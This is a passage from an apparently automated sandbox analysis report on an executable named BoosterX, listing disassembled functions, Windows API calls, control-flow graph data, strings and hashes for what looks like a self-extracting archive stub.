                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 310a567e1b0cdd217b1bc7ae60d0b9563787d76a53dbdd708a46cc85320c2f81
                                                    • Instruction ID: d120765f6cc22e434e31143b87ead6786598abd429e62df59c8607c2f6a327fc
                                                    • Opcode Fuzzy Hash: 310a567e1b0cdd217b1bc7ae60d0b9563787d76a53dbdd708a46cc85320c2f81
                                                    • Instruction Fuzzy Hash: E0129066B08B43A9EA10DF65D4442AD3372AB457A9F500232DE9CD7BEADF3CE585C340
                                                    Function 00007FF6C0362480 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 3549 7ff6c0362480-7ff6c03624bb 3550 7ff6c03624bd-7ff6c03624c4 3549->3550 3551 7ff6c03624c6 3549->3551 3550->3551 3552 7ff6c03624c9-7ff6c0362538 3550->3552 3551->3552 3553 7ff6c036253a 3552->3553 3554 7ff6c036253d-7ff6c0362568 CreateFileW 3552->3554 3553->3554 3555 7ff6c0362648-7ff6c036264d 3554->3555 3556 7ff6c036256e-7ff6c036259e GetLastError call 7ff6c03669cc 3554->3556 3557 7ff6c0362653-7ff6c0362657 3555->3557 3565 7ff6c03625ec 3556->3565 3566 7ff6c03625a0-7ff6c03625ea CreateFileW GetLastError 3556->3566 3559 7ff6c0362659-7ff6c036265c 3557->3559 3560 7ff6c0362665-7ff6c0362669 3557->3560 3559->3560 3562 7ff6c036265e 3559->3562 3563 7ff6c036266b-7ff6c036266f 3560->3563 3564 7ff6c036268f-7ff6c03626a3 3560->3564 3562->3560 3563->3564 3567 7ff6c0362671-7ff6c0362689 SetFileTime 3563->3567 3568 7ff6c03626cc-7ff6c03626f5 call 7ff6c03822a0 3564->3568 3569 7ff6c03626a5-7ff6c03626b0 3564->3569 3570 7ff6c03625f2-7ff6c03625fa 3565->3570 3566->3570 3567->3564 3571 7ff6c03626c8 3569->3571 3572 7ff6c03626b2-7ff6c03626ba 3569->3572 3573 7ff6c03625fc-7ff6c0362613 3570->3573 3574 7ff6c0362633-7ff6c0362646 3570->3574 3571->3568 3576 7ff6c03626bc 3572->3576 3577 7ff6c03626bf-7ff6c03626c3 call 7ff6c03520b0 3572->3577 3578 7ff6c0362615-7ff6c0362628 3573->3578 3579 7ff6c036262e call 7ff6c038218c 3573->3579 3574->3557 3576->3577 3577->3571 3578->3579 3582 7ff6c03626f6-7ff6c03626fb call 7ff6c0387884 3578->3582 3579->3574
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3536497005-0
                                                    • Opcode ID: 0eb7fe8ef4f4561f9daaefcb571c72f3411a72b64bfc3ca10e0d2da5fc9e6a2c
                                                    • Instruction ID: 2f3c7e4383bf0eaef934d3febce9c2f04de1211899d3aeebacfa6d6bb32176c7
                                                    • Opcode Fuzzy Hash: 0eb7fe8ef4f4561f9daaefcb571c72f3411a72b64bfc3ca10e0d2da5fc9e6a2c
                                                    • Instruction Fuzzy Hash: 3C61D276A08A8296E7208F29E4003AE67A1B7857A9F101324DFEDC3BD4DF7DD0548744
                                                    Function 00007FF6C037FC8C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 3586 7ff6c037fc8c-7ff6c037fcb7 3587 7ff6c037fcbc-7ff6c037fcf6 SetEnvironmentVariableW call 7ff6c036d05c 3586->3587 3588 7ff6c037fcb9 3586->3588 3591 7ff6c037fcf8 3587->3591 3592 7ff6c037fd43-7ff6c037fd4b 3587->3592 3588->3587 3595 7ff6c037fcfc-7ff6c037fd04 3591->3595 3593 7ff6c037fd4d-7ff6c037fd63 3592->3593 3594 7ff6c037fd7f-7ff6c037fd9a call 7ff6c03822a0 3592->3594 3596 7ff6c037fd7a call 7ff6c038218c 3593->3596 3597 7ff6c037fd65-7ff6c037fd78 3593->3597 3599 7ff6c037fd09-7ff6c037fd14 call 7ff6c036d43c 3595->3599 3600 7ff6c037fd06 3595->3600 3596->3594 3597->3596 3601 7ff6c037fd9b-7ff6c037fda3 call 7ff6c0387884 3597->3601 3607 7ff6c037fd16-7ff6c037fd21 3599->3607 3608 7ff6c037fd23-7ff6c037fd28 3599->3608 3600->3599 3607->3595 3610 7ff6c037fd2d-7ff6c037fd42 SetEnvironmentVariableW 3608->3610 3611 7ff6c037fd2a 3608->3611 3610->3592 3611->3610
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                    • String ID: sfxcmd$sfxpar
                                                    • API String ID: 3540648995-3493335439
                                                    • Opcode ID: 00e990ce53ad4bb77229a3bc1c9449996c970d45aeb73b3f170da1ca566d15b8
                                                    • Instruction ID: 7f8e44470c02af5e478f1bd349c54f86d4fe816c745d99009353df3431bb8c29
                                                    • Opcode Fuzzy Hash: 00e990ce53ad4bb77229a3bc1c9449996c970d45aeb73b3f170da1ca566d15b8
                                                    • Instruction Fuzzy Hash: A3318D32E14A17A8EB04CF69E8851AC2371FB48B99F140136DE9DD7BA9CF38D181C344
                                                    Function 00007FF6C037AF94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
                                                    • String ID: ]
                                                    • API String ID: 3561356813-3352871620
                                                    • Opcode ID: c6bf9e19450fbf4cc7b28015e62d6f04fdd2e3c624e8f0d9c6f2b4e6ab7b0bdc
                                                    • Instruction ID: f62f4d5ae1b706c02aa08932f8b30f7c34bf52f225c1e16191e264a00bfd60cf
                                                    • Opcode Fuzzy Hash: c6bf9e19450fbf4cc7b28015e62d6f04fdd2e3c624e8f0d9c6f2b4e6ab7b0bdc
                                                    • Instruction Fuzzy Hash: 28118921B0D643D1FA649F5A97543795291AF89BD6F080034DD9DC7BD5DF7CE8048A00
                                                    Function 00007FF6C037AD9C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 1266772231-0
                                                    • Opcode ID: 48dfac8e33024647184e1a60fb39053494a02480d92f3e69543185b5e5c85bfd
                                                    • Instruction ID: e3ddd8fb059d2879a33c2980d187b27be210b708872bb24e64d6a1886af7798c
                                                    • Opcode Fuzzy Hash: 48dfac8e33024647184e1a60fb39053494a02480d92f3e69543185b5e5c85bfd
                                                    • Instruction Fuzzy Hash: 83F0EC25A38953A2FB609F28E895A762265FFD070AF905431E58EC1A94DF3CD108CB00
                                                    Function 00007FF6C0379168 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                    • String ID: EDIT
                                                    • API String ID: 4243998846-3080729518
                                                    • Opcode ID: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                                    • Instruction ID: c1b454e9a1fc8c1fa46544e6b8b7868d97a7eda04d7380af6890835675e7a089
                                                    • Opcode Fuzzy Hash: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                                    • Instruction Fuzzy Hash: CA018121B08A43A1FA209F29F8157B66394AF99746F840132CD8EC6795DF3CD149C640
                                                    Function 00007FF6C0362CA0 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$Handle
                                                    • String ID:
                                                    • API String ID: 4209713984-0
                                                    • Opcode ID: c8c518eed565a04f9cf962580e303a423e678b4aba21c9ba139e0a597fc40599
                                                    • Instruction ID: ed812d31465adc4af887a32dcbca9dc79f1f7b700c45529b03e743efb92b4397
                                                    • Opcode Fuzzy Hash: c8c518eed565a04f9cf962580e303a423e678b4aba21c9ba139e0a597fc40599
                                                    • Instruction Fuzzy Hash: C751D362A19A43A2EA10CF24D4447BA6360FF85B96F450132EF8EC6BA4DF7CE585C704
                                                    Function 00007FF6C0380360 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                    • String ID:
                                                    • API String ID: 2912839123-0
                                                    • Opcode ID: dbe46ff790c20b89912a0fdaa554b5e2640218e7059209ab3c025edf3ca2331f
                                                    • Instruction ID: 47cda9a0dedd55f4ddc6a9fce855363da8d97eaab6f4fd5b07fa4a941dae6ae8
                                                    • Opcode Fuzzy Hash: dbe46ff790c20b89912a0fdaa554b5e2640218e7059209ab3c025edf3ca2331f
                                                    • Instruction Fuzzy Hash: C3518C62F28A53A4FA009FA5D8492AD2322AF45BA5F500737DA9CD7BE6DF6CD540C310
                                                    Function 00007FF6C0382CEC Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 1452418845-0
                                                    • Opcode ID: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                                    • Instruction ID: c4c38bf8b7586b8303e3b1cd336a65be94b13014ad90e45e27d75e90e458b4ca
                                                    • Opcode Fuzzy Hash: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                                    • Instruction Fuzzy Hash: D4313A21E0C50366FA54AF65D4113BA1291AF81386F5446B7EACECB3E3DF2CB5088209
                                                    Function 00007FF6C03622E0 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FileHandleRead
                                                    • String ID:
                                                    • API String ID: 2244327787-0
                                                    • Opcode ID: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                                    • Instruction ID: 1dbc31a451841fa45a65a347f09dad39766d48d10021e3d14302aec98aef5932
                                                    • Opcode Fuzzy Hash: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                                    • Instruction Fuzzy Hash: 56219D25E0CE13A5EB609F21A4002BD63A0FB85B9AF254130DFDDCA784CF3CE8458749
                                                    Function 00007FF6C036E8C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF6C036EC58: ResetEvent.KERNEL32 ref: 00007FF6C036EC71
                                                      • Part of subcall function 00007FF6C036EC58: ReleaseSemaphore.KERNEL32 ref: 00007FF6C036EC87
                                                    • ReleaseSemaphore.KERNEL32 ref: 00007FF6C036E8F0
                                                    • CloseHandle.KERNELBASE ref: 00007FF6C036E90F
                                                    • DeleteCriticalSection.KERNEL32 ref: 00007FF6C036E926
                                                    • CloseHandle.KERNEL32 ref: 00007FF6C036E933
                                                      • Part of subcall function 00007FF6C036E9D8: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C036E8DB,?,?,?,00007FF6C03645FA,?,?,?), ref: 00007FF6C036E9DF
                                                      • Part of subcall function 00007FF6C036E9D8: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C036E8DB,?,?,?,00007FF6C03645FA,?,?,?), ref: 00007FF6C036E9EA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                    • String ID:
                                                    • API String ID: 502429940-0
                                                    • Opcode ID: 2e544ca9f261f0376ccf83801800674c3d7e3c4b44cdcb23e888c53b8c5725df
                                                    • Instruction ID: 393edb40ceeaeb62289e81360e3e61e99893a989f45846952e62b3f98aeb7556
                                                    • Opcode Fuzzy Hash: 2e544ca9f261f0376ccf83801800674c3d7e3c4b44cdcb23e888c53b8c5725df
                                                    • Instruction Fuzzy Hash: 7801ED36A14A92B2E6589F21E5456A96361FB84B91F004031DB9EC3765CF39E4B98740
                                                    Function 00007FF6C036EA20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Thread$CreatePriority
                                                    • String ID: CreateThread failed
                                                    • API String ID: 2610526550-3849766595
                                                    • Opcode ID: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                                    • Instruction ID: 39510812d605197777590c218bc65c78219d23695b3a67fe4cd7a9cc895fc9ae
                                                    • Opcode Fuzzy Hash: 485e209270f66b590ec8176dafed7bfb240ecdea8f700010846f48018d17601d
                                                    • Instruction Fuzzy Hash: B4114F31A18A43A2FB00DF14E8411A97360FB8479AF544131DACDC2769DF3CE58AC740
                                                    Function 00007FF6C03793EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: DirectoryInitializeMallocSystem
                                                    • String ID: riched20.dll
                                                    • API String ID: 174490985-3360196438
                                                    • Opcode ID: a2ea48ad6eaf40a2712c31cf90fd1ad0c531bf965d53d4a99af5176349890e79
                                                    • Instruction ID: c00f2adafac0504afa2f4b0fe69451bd44500b60900ce126fb0fa0a1e30b5c43
                                                    • Opcode Fuzzy Hash: a2ea48ad6eaf40a2712c31cf90fd1ad0c531bf965d53d4a99af5176349890e79
                                                    • Instruction Fuzzy Hash: A2F04F71A18A4292EB409F24F4191AAB7A0FF88759F400135E6CEC2794DF7CD148CB00
                                                    Function 00007FF6C03708DC Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF6C03784BC: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6C03784EC
                                                      • Part of subcall function 00007FF6C036AAA0: LoadStringW.USER32 ref: 00007FF6C036AB27
                                                      • Part of subcall function 00007FF6C036AAA0: LoadStringW.USER32 ref: 00007FF6C036AB40
                                                      • Part of subcall function 00007FF6C0351FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C0351FFB
                                                      • Part of subcall function 00007FF6C035129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C0351396
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C038013B
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C0380141
                                                    • SendDlgItemMessageW.USER32 ref: 00007FF6C0380172
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                    • String ID:
                                                    • API String ID: 3106221260-0
                                                    • Opcode ID: cf0567e6bf8155e956a8b4511c09126abe169540c11f499ccdae7d5e6eb88ab3
                                                    • Instruction ID: 36752f7f68b3954f208e3e8bc770f78dcfd9f68c73ce9fd95bcc123621c48653
                                                    • Opcode Fuzzy Hash: cf0567e6bf8155e956a8b4511c09126abe169540c11f499ccdae7d5e6eb88ab3
                                                    • Instruction Fuzzy Hash: E351AD62F14A83AAFB109FA5D4452FC2362AB85B99F500636DE8DD779ADF2CE500C340
                                                    Function 00007FF6C03620F4 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
